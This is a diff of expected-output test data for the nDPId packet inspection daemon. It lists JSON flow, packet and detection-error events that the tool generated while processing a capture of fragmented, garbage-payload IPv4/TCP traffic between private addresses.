00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8451,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnVoZ2tmZHNi"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244032907,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAmtudmMvLnRnZnRnP0dSP0cRsQAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244032907,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAmtudmMvLnRnZnRnP0dSP0cRsQAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8453,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032907}
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":8453,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAlI\/c1I\/NzQ4Mzk2KSgqJl4="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8454,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032907}
@@ -17528,8 +17528,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8763,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkAhQCMkJV4mKigpKComXiU="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8764,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032911}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8764,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiQjQCMkJV4m"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiooKiZeJSQjJiooS0lKSEc0yAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiooKiZeJSQjJiooS0lKSEc0yAAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8766,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244033211}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8766,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkZEMiomREZHSEpLJl4lJCM="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8767,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244033211}
@@ -18154,64 +18154,64 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":9076,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244033215}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmxrZGE+TDxN"}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
